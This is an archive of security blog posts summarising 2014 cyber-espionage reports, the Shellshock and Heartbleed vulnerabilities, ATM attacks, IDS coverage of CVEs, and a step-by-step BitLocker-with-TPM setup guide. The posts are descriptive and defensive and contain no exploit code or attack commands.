Category Archives: Security Essentials

2014 – Campaign’s of Cyber Espionage

apt-reports-1[In the article below, a summary of publicly disclosed cyber espionage campaigns released during 2014.  An interesting read for those in the information security field.~Luis]

In January 2014 security software vendor Symantec published a report about a campaign of attacks that targeted the energy sector. The report Targeted Attacks Against the Energy Sector. According to Candid Wueest : The energy sector has become a major focus for targeted attacks and is now among the top five most targeted sectors worldwide. Companies in the sector are facing a growing risk of having their services interrupted or losing data.

In February 2014, Russian security software vendor Kaspersky released a report describing a series of attacks observed against 31 countries. The code named they used to refer to the incidents was Careto.  Unveiling “Careto” – The Masked APT. The Mask is an advanced threat actor that has been involved in cyber-espionage operations since at least 2007. The name “Mask” comes from the Spanish slang word “Careto” (“Ugly Face” or “Mask”) which the authors included in some of the malware modules.

During the same month the security company Trend Micro released its findings about the Russian underground. This report Russian Underground Revisited is the second part of a report that was initially released in 2012 which provided a summary on the underground market. Places in the Internet where cybercriminals converge to sell and buy different products and services exist. Instead of creating their own attack tools from scratch, they can instead purchase what they need from peers who offer competitive prices.

A few months later, Symantec described a series of attacks mainly against energy sector companies.  Dragonfly: Cyberespionage Attacks Against Energy Suppliers A cyber espionage campaign against a range of targets, mainly in the energy sector, gave attackers the ability to mount sabotage operations against their victims. The attackers, known to Symantec as Dragonfly, managed to compromise a number of strategically important organizations for spying purposes and, if they had used the sabotage capabilities open to them, could have caused damage or disruption to the energy supply in the affected countries.

June was  the month when the security company Crowdstrike released its findings about campaign code named Putter Panda.  CrowdStrike has been tracking the activity of a cyber espionage group operating out of Shanghai, China, with connections to the People’s Liberation Army Third General Staff Department (GSD) 12th Bureau Military Unit Cover Designator (MUCD) 61486, since 2012.

In July, another report from Kaspersky came forward. This time with the code name Energetic Bear more like a Crouching Yeti . Kasperspky also release an appendix containing IOCs.  Energetic Bear/Crouching Yeti is an actor involved in several advanced persistent threat (APT) campaigns that has been active going back to at least the end of 2010.

A report issued by CrowdStrike described sophisticated attack against a large Fortune 500 company, Campaign code name Deep Panda. In late December 2011, CrodwStrike received three binary executables files that were suspected of having been involved in a sophisticated attack against a large Fortune 500 company. The files were analyzed to understand first if they were in fact malicious, and the level of sophistication of the samples.

Noteworthy, a report released by the company AIRBUS Defence & Space with the code name Operation Pitty Tiger – “The Eye of the Tiger”. This report contained information on a group of APT attackers known as “Pitty Tiger”. This information comes directly from investigations led by our Threat Intelligence. Pitty Tiger is a group of attackers that have been active since at least 2011. They have targeted private companies in several sectors, such as defense and telecommunications, but also at least one government.

Key findings about a campaign code named  The Epic Turla Operation was released in August by Kaspersky. This was the result of 10 months of investigation on attacks against more than 45 countries. The company also released an appendix with  IOCs. Kaspersky Lab researchers have analyzed a massive cyber-espionage operation which we call “Epic Turla”. The attackers behind Epic Turla have infected several hundred computers in more than 45 countries, including government institutions, embassies, military, education, research and pharmaceutical companies. The attacks are known to have used at least two zero-day exploits.

Operation Arachnophobia was the code name for a campaign released by the company ThreatConnect working in collaboration with Fireeye. We first discovered a suspected Pakistani threat group in 2013, and have since followed their activity and found new observations and insight into the group and its tactics that we call, “Operation Arachnophobia”.Working in collaboration with FireEye Labs, the TCIRT team has discovered evidence pointing to this groups continued exploitation operations using custom malware, dubbed BITTERBUG by FireEye.

In October iSIGHT Partners released the details of a campaign code named Sandworm . A report that disclosed the usage of a 0 day vulnerability used against Western governments, NATO and the Ukrainian government. in close collaboration with Microsoft – announced the discovery of a zero-day vulnerability impacting all supported versions of Microsoft Windows and Windows Server 2008 and 2012. Microsoft is making a patch for this vulnerability available as part of patch updates on the 14th  – CVE-2014-4114.Exploitation of this vulnerability was discovered in the wild in connection with a cyber-espionage campaign that iSIGHT Partners attributes to Russia.

During the same month the security software company Sophos released a report code named  The Rotten Tomato Campaign . Gabor Szappanos, of SophosLabs Hungary, writes an interesting dive into the world of the attackers, examining the malware used by cybercriminals in these attacks, and shows how several different groups used the same zero-day Microsoft Word exploit.

A series of attacks targeting companies in the Defense Industry was code named Operation Death Click and released by Invincea. Most targeted attacks against organizations originate as spear-phish campaigns or watering hole style web driveby attacks. Within the last six months, Invincea has discovered and stopped targeted malvertizing attacks against specific companies — particularly those in the Defense Industrial Base.

A large scale effort that targeted Fortune 500 companies code named  Operation SMN : Axiom Threat Actor Group Report was disclosed by the software analytics company Novetta. The company also released extra resources varying from static analysis of the malware to yara signatures. Axiom is responsible for directing highly sophisticated cyber espionage operations against numerous Fortune 500 companies, journalists, environmental groups, pro-democracy groups, software companies, academic institutions, and government agencies worldwide for at least the last six years.

The Italian firm Tiger Security disclosed details about Operation Distributed Dragons Although it is no news that the way of performing attacks continuously changes shape and form, since January 2014 there has been evidence of a new “breed” of Chinese DDoS attacks based on the breach of Linux servers, whose objectives are not completely clear but significantly different from the approach so far experienced.

A series of incidents targeting United States and its allies using spear-phishing tactics was released by TrendMicro  – Operation Pawn Storm – Using Decoys to Evade Detection. Operation Pawn Storm refers to economic and political espionage attacks instigated by a group of threat actors primarily targeting military, embassy, and defense contractor personnel from the United States and its allies.

The German security software company G Data Software published the details about OPERATION “TOOHASHThe experts of G DATA’s SecurityLabs discovered a cyber-espionage campaign that perfectly exemplifies the way how targeted attacks work. The purpose of this campaign was to steal valuable documents from the targeted entity. We entitle this operation “TooHash”.

Still in October the security software vendor Fireeye published a report about a campaign of attacks that targeted the energy sector. APT28: A WINDOW INTO RUSSIA’S CYBER ESPIONAGE OPERATIONS? In this paper we discuss a threat group whose malware is already fairly well-known in the cybersecurity community. This group, unlike the China-based threat actors we track, does not appear to conduct widespread intellectual property theft for economic gain. Nor have we observed the group steal and profit from financial account information.

Last week the details about a campaign code named The Dark Hotel APT were released by Kaspersky . Facts about attackers that have been active for at least seven years, conducting targeted strikes against targeted guests at other luxury hotels in Asia as well as infecting victims via spear-phishing attacks and other mechanisms. The company also released an appendix with IOCsThe Darkhotel APT is a threat actor possessing a seemingly inconsistent and contradictory set of characteristics, some advanced and some fairly rudimentary.

Tagged , ,

ShellShock – Highlights

shellshock-tweetWednesday, 24 of September, Florian Weimer from Red Hat security team publicly announced on Open Source Security Maillng list  a vulnerability in GNU Bash discovered by Stephane Chazelas. 1 hour later he released a patch  and the technical details about the vulnerability – “an environment variable with an arbitrary name can be used as a carrier for a malicious function definition containing trailing commands makes this vulnerability particularly severe; it enables network-based exploitation“. Essentially a command injection vulnerability that allows remote code execution. Meanwhile some news sites were already publishing details. This situation was not altogether confortable when it was known that details were disclosed before the embargo that was putted together in order to give vendors to patch it before it went public. This vulnerability got CVE-2014-6271 with a CVSS score of 10 and low score on complexity which means its easy to exploit. It affected all Bash versions prior to 4.3. The vectors of attack as described by the US-CERT include:

  • Apache HTTP Server using mod_cgi or mod_cgid scripts either written in bash, or spawn GNU Bash subshells, or on any system where the /bin/sh interface is implemented using GNU Bash.
  • Override or Bypass ForceCommand feature in OpenSSH sshd and limited protection for some Git and Subversion deployments used to restrict shells and allows arbitrary command execution capabilities. This data path is vulnerable on systems where the /bin/sh interface is implemented using GNU Bash.
  • Allow arbitrary commands to run on a DHCP client machine.

From the previous described attack vectors the HTTP requests to CGI scripts were identified as the major concern.  While the news were still spreading, on the 25th of September when people were rushing to patch, Tavis Ormady proved that the patch was incomplete and the vulnerability was still exploitable. This got identified as CVE-2014-7169 with a CVSS score of 10. This got patched on Friday the 26th. Meanwhile another two vulnerabilities were discovered by Todd Sabin. Harder to pull off but still critical. They got CVE-2014-7186 and CVE-2014-7187. in the meantime Michal Zaleski who is another brilliant security researcher and works with Tavis on Google security team found two additional vulnerabilites. He gave the details privatelly in order to give time to patch. On 1st of October, Michal disclosed the details. These last two vvulnerabilities got CVE-2014-6277 and CVE-2014-6278.  The last patchs from the vendors mitigate all the 6 vulnerabilities. Below is a timeline of the key dates during this rush week.


During the rush hours of the disclosure, Robert Graham from Errata Security started to massivelly scan the internet looking for vulnerable hosts.  The results were impressive. Troy Hunt also wrote a nice summary about it. While security researchers, vendors and corporations were working together to assess and mitigate the risk of this vulnerability Evil started to show is fingers. Attacks started attempting to exploit the vulnerability. Rapid7 weaponized the exploit into Metasploit.  Due to the wide amount of attacks seen SANS raised its INFOCON level to Yellow on the 26th. Johannes Ulrich wrote a great summary about it. Among the exploitation techniques seen were automated click fraud, reverse shell attempts, all kinds of recon activity, PERL bots and others. Trend Micro released a comprehensive.technical report. FireEye wrote a great summary on the exploit techniques seen in the wild.

Tagged , , , , , , , , , , ,

Hands on Training to develop cyber security skills

abstractThe demand for qualified security professionals who possess the required skills and relevant education is increasing substantially. However, the supply is not meeting the demand. The information security industry is growing in size, density and specialization. Across all businesses we need people who understand computer systems, networks and security. In order to help facilitate the growth of these information security skills hands-on training (H.O.T.) can be used to make sure that our abilities have been tested in the most realistic way possible This paper will show how to build an environment that will represent real-world security issues and their respective flaws. Topics such as incident handling, intrusion analysis, system administration, network security, forensics or penetration testing can be taught and practiced. Among other objectives, the primary goal is to grow security expertise and awareness by using a low-cost, high return and self paced hands-on training method to allow us to understand attack methods in order to create effective defenses.

This is the abstract of my paper that was just released on the SANS reading room as part of my journey to get the GIAC GCIH gold certification. I started drafting the idea of writing a paper last October.  The experience was interesting, sometimes frustrating, long but with lots of fun. Essentially, I prepared all my ideas in the lab and practiced the different scenarios I wanted to share so they could be repeatable and consistent in order to be documented. In parallel I started to write some notes, do research and find references.  Around last December I submitted the first draft to SANS. They accepted the paper and assigned an advisor to work with me.  From that moment onwards I had a deadline of 6 months. It followed a series of back and forth with the advisor. I must admit that Dr. Johannes Ulrich from SANS was very supportive, responsive and  a great mentor during the all process.  I also would like to thank to Angel Parrizas for his constructive feedback during the paper creation and thoughts on the structure, Michael Bem for his help with the opening language, Grzegorz Drozda in the beginning with his SQL kung-fu and, finally, my family that had a lot of patience to deal with the long hours of computer.

My biggest challenge was the language in terms of structure, phrasing, diction, subject-verb agreement, and tense since English is a second language for me. I believe to create a paper like this you need strong motivation, willingness, persistence and family support but it is a rewarding experience and allowed me to share my experiences, learn, reinforce my knowledge and contribute to the community. I definitely recommend this exercise to anyone who is involved in the security industry.

The paper is available here!

Tagged ,

BitLocker with TPM in 10 Steps.

lockerStarting with Windows Vista, Microsoft used a secure development lifecycle from start to finish. By introducing this software development practices, Microsoft built better software using secure design, threat modeling, secure coding, security testing, and best practices surrounding privacy. One of many features introduced was the BitLocker drive encryption. This allows to encrypt the full content of the volumes and is designed to work with Trusted Platform Module (TPM) security device. By encrypting the drive contents you add an additional layer of protection that helps defend against evil maid attacks, offline attacks and disclosure of data when a laptop is lost or stolen. Windows 7 brought more enhancements to this technology that will drive its adoption because is more user friendly, supports BitLocker To Go (protects removable media) and reduces the administration overhead e.g. does not require an admin to layout the hard drive partition in a special form (now you know why during Windows 7 you might see a partition of 100MB NTFS Volume – This volume allows the BIOS locate and run the Bootmgr). BitLocker can work with or without a TPM. A TPM is a tamper resistant security chip on the system board that will hold the  keys for encryption and check the integrity of the boot sequence and allows the most secure BitLocker implementation. BitLocker needs a TPM chip version 1.2 or higher enabled on the BIOS. Without a TPM the Bitlocker can store its keys on a USB drive that will be used during boot sequence. BitLocker encrypts the contents of the hard drive using AES128-CBC (by default) or AES256-CBC algorithm, with a Microsoft-specific extension called a diffuser. To run BitLocker you need Windows 7 Enterprise or Ultimate edition. When configuring Bitlocker you have a number of options:

  • TPM Only: No authentication required for the boot sequence but protects against offline attacks and is the most transparent method to the user.
  • TPM with PIN : Adds “What you know” factor to the boot process and the user is prompted for a PIN.
  • TPM with USB : Adds “What you have” factor to the boot process and the user needs to insert the USB pen that contains the key.
  • TPM with USB and PIN : Most secure mode using 2 factor authentication boot process but the most costly in terms of support e.g. user loses its USB or forgets its PIN.
  • Without TPM : It does not provide the preboot protection and uses a USB pen to store the key.

How to enable BitLocker with TPM in 10 Steps?

  1. Determine if your computer has support for TPM 1.2.
  2. Enable TPM in the BIOS settings.
  3. On Windows launch the TPM management console (tpm.msc).
  4. Initialize it and create a owner password.
  5. Save and print the password.
  6. Define Group Policy settings to ensure a TPM is used with BitLocker and define the authentication method.
  7. Turn on BitLocker on the desired hard drive.
  8. Define the authentication method.
  9. Save and print the recovery key.
  10. Encrypt the drive.

Let’s review each one of these steps into more detail.

Step 1 : To determine if your computer has TPM support you can check your computer model documentation or check the BIOS directly.  In my case I had a second hand Dell Latitude E6400 Laptop with TPM capabilities.

Step 2: I went to the BIOS and enabled the TPM Security option.


Step 3 : I booted Windows and called the TPM management console by executing tpm.msc.


Step 4 : In the TPM management console, click on the Initialize. This will start the process where you need to manually create a password or generate one. In this case I selected to automatically create the TPM password.


Step 5 : Save the password file in a USB drive (file.tpm) and print the password for recovery purposes. Please keep this file in a secure location away from your computer’s
local hard drive.


Step 6 : On windows run gpedit.msc and go to the Group Policy Editor. Provide administrator credentials if you have UAC configured. Navigate to Computer Configuration – Administrative Templates –  Windows Components – BitLocker Drive Encryption, Operating System Drives: Require Additional Authentication at Startup. Here Enable this setting and under options, verify that the option Allow BitLocker Without a Compatible TPM is unchecked. I left the remaining settings by default but it is here that you can configure 2 factor for the boot process.



Step 7 : Select the drive you want to encrypt, right click and select Turn On BitLocker.



Step 8 : The options that you defined in the group policy will show here in order to define the authentication method, in this case I selected TPM with PIN.


Step 9 : Save the recovery key to a USB pen and and print it for recovery purposes. The recovery key is used to recover the data on a BitLocker protected drive.


Step 10 : Finally, encrypt the drive and select the “Run Bitlocker system check” in order to ensure the recovery key can be used.



When you reboot your computer you will be prompted with a Windows BitLocker Drive Encryption PIN entry where you need to supply the PIN in order to start the operating system.

I terms of  management the BitLocker settings can be configured/checked using the manage-bde.exe command. For systems where the Windows is part of a domain the key for each machine can be backed up as part of an escrow service. This way business owners like legal teams or others can gain access to the machine in case the user loses the USB key or PIN or there is the need to due to an insider threat. Another method is to use the data recovery agent (DRA) that creates a certificate that can be used to unlock the encrypted volumes. Further there are several group policies settings that can be configured.

The recovery process is also easy in case you have the USB drive/printed the recovery keys. Note that during the boot process if the system detect any changes like a different hard drive or change/upgrade the bios you might be asked to provide the recovery keys due to an alteration of the boot process. Other than the full volume encryption the BitLocker To Go is also great method to encrypt removable hard disks and thumb drives.

As you can see is extremely easy to add additional layer of protection to your system. If you have a Windows 7 Enterprise or Ultimate license then this is a great feature to protect the family photos and wife cooking trade secrets from falling into the wrong hands.



Windows Internals, Sixth Edition, Part 2 By: Mark E. Russinovich, David A. Solomon, and Alex Ionescu


Tagged , , ,

Heartbleed – OpenSSL Bug

hearbleedThis has been an extremely crazy week for the security community!

“The Heartbleed bug allows anyone on the Internet to read the memory of the systems protected by the vulnerable versions of the OpenSSL software. This compromises the secret keys used to identify the service providers and to encrypt the traffic, the names and passwords of the users and the actual content. This allows attackers to eavesdrop communications, steal data directly from the services and users and to impersonate services and users”

OpenSSL published an advisory name Heartbleed classified as CVE-2014-0160 which was discovered by Neel Mehta and Codenomicon. An estimate of 500k widely trusted websites were (some still are) impacted. Bruce Scheneier expressed his opinion as being a catastrophic  bug. SANS has raised its INFOCON threat level to yellow and made 2 great webcasts briefings here and here. Plus it maintains a list of vendors and its respective patches. If you want to know how to find if your  website or appliance is vulnerable Jared Stafford created a PoC named Several sites are providing a way to test it including Qualys and a site created by Filippo Valsorda here. Brian Krebs and Ed Felten provide great overview on what to do to mitigate it.  Sean Cassidy  wrote great technical details here. Bitcoin core software was updated. Tomas Rzepka (@1njected) accomplished to retrieve the private keys from a FreeBSD 10 system. Mark Loman showed how Yahoo was affected. Matthew Sullivan showed how the leak data could be used to hijack web session and more examples here and here. A scanner was quickly incorporated into Metasploit. Many other resources here. Cloudfare made a challenge in case you want to try it out and get their private keys.  Finally, you might want to consider changing your passwords in case you have an account in the following sites.

“OpenSSL’s security advisory states that only versions 1.0.1 and 1.0.2-beta are affected, including 1.0.1f and 1.0.2-beta1. The vulnerability has been fixed in OpenSSL 1.0.1g, and users who are unable to upgrade immediately can disable heartbeat support by recompiling OpenSSL with the -DOPENSSL_NO_HEARTBEATS flag.
Certificates and keys at risk of compromise should be revoked and replaced, particularly if they are used to protect sensitive data”

Tagged , , , , , ,

Could we ask John Connor to bring his Atari and bypass this?

Automatic Teller Machines (ATM) are devices that provide the customers of a financial institution with the ability to perform financial transactions [1].  They are available everywhere and often use well known operating systems and off-the-shelf hardware. During last Christmas while on vacations and walking through the beautiful city of Lisbon I came across the ATM posted in the picture.Winnt-ATM

An ATM running Windows NT operating system! – By this time the ATMs should be running Windows XP embedded not to say Windows 7 embedded!

Without a doubt the most common ATM attacks involve using card skimmers. An excellent resource to read about card skimmers is the series that Brian Krebs putted together on “all about skimmers”. It’s definitely an opening eye and excellent to raise awareness. Other attacks techniques are card trapping, pin cracking, phishing and malicious software [2]. However when I saw this ATM I automatically remembered Barnaby Jack and his DefCon presentation Jackpotting Automated Teller Machines.  It’s like in Terminator 2, where John Connor uses its Atari to bypass security on an ATM with a ribbon cable connecting the parallel interface to a magnetic stripe card. Fiction apart these kinds of attacks are very real. For example, this one that was seen in Mexico or the Troj/Skimer-A with a in-depth analysis by XyliBox. Another interesting report is this one from Trustwave which shows  a piece of malware that targets ATMs with Windows XP operating system. Diebold ATM Security Communication and Support Center as good information about all kind of attacks like the one seen in Russia where an insider, would install the malicious code on several ATMs running Windows XP embedded. Then with a special activation card that would allowed complete control of the ATM.

Would you withdraw money from an ATM  running Windows NT?

[1-2] Mubarak Al-Mutairi; Lawan Mohammed ; IGI Global ; Cases on ICT Utilization, Practice and Solutions.


CVE November Awareness Bulletin

[Following previous month’s CVE Awareness Bulletin below the November release]

The CVE November Awareness Bulletin is an initiative that aims to provide further intelligence and analysis concerning the last vulnerabilities published by the National Institute of Standards and Technology (NIST), National Vulnerability Database (NVD) and the IDS vendors’ coverage for these vulnerabilities.

Common Vulnerabilities and Exposures (CVE) is a public list of common names made available by MITRE Corporation for vulnerabilities and exposures that are publicly known.

This is the most popular list of vulnerabilities and is used as a reference across the whole security industry. It should not be considered absolute but due to the nature of its mission and the current sponsors – Department of Homeland Security (DHS), National Cybersecurity and Communications Integration Center (NCCIC) – it is widely adopted across the industry.

Based on this public information I decided to take a look at what has been released during the month of November. There were 389 vulnerabilities published where 56 were issued with a Common Vulnerability Scoring System (CVSS) score of 8 or higher – CVSS provides a standardized method for rating vulnerabilities using a scoring system based on their different properties from 1 to 10. From these security vulnerabilities, I compared the last signature updates available from products that have a significant share of the market i.e., Checkpoint, Tipping point, SourceFire, Juniper, Cisco and Palo Alto. The result is that SourceFire has the best coverage with 23%. TippingPoint, Checkpoint and Juniper rank second with 16%. Cisco ranked third with 12% followed by Palo Alto with 0%

The following graph illustrates the mapping between the CVEs published in November with a CVSS equal or higher than 8 by vulnerability type and the vendor coverage:


In addition to looking at all the vulnerabilities released, it is also essential to look into detail for specific coverage like Microsoft products vulnerabilities. On the 12th of November the Microsoft Security Bulletin (a.k.a Patch Tuesday) announced 25 vulnerabilities. From these 12 have a CVSS score equal or higher than 8. From these the vendor coverage is shown in the following table:


The vendors analyzed have provided signatures on the same date (12 of November) or few days later. The mentioned signatures and patches should be applied as soon as possible but you should also fully evaluate them (when possible) before applying it production systems.

In addition to that, following signature update deployment, you should always check which signatures have been enabled by default.  Plus you should be evaluating what is the impact in your environment for the CVEs that don’t have coverage.

Bottom line, the vendors that were analyzed have a quick response but the coverage should be broader. September we saw 56 vulnerabilities with a CVSS higher than 8 but only 23% of them have coverage in the best case (SourceFire). This means 77% of the published vulnerabilities don’t have coverage. Regarding the vendor response to the Microsoft Security Bulletin Summary for November 2013, the coverage is better and goes up to 100% in the best case (SourceFire). Interesting to note that some of these vulnerabilities are related to software that don’t have significant share in the market. Even if the vendors would have 100% coverage they would not apply to all environments. Furthermore, the likelihood of these vulnerabilities to be successful exploited should also be considered since some of them could be very hard to pull off. So it’s key that you know your infrastructure, your assets and mainly where are your business crown jewels. Then you should be able to help them better protect your intellectual property and determine will be the impact if your intellectual property gets disclosed, altered or destroyed.

Tagged , , , , ,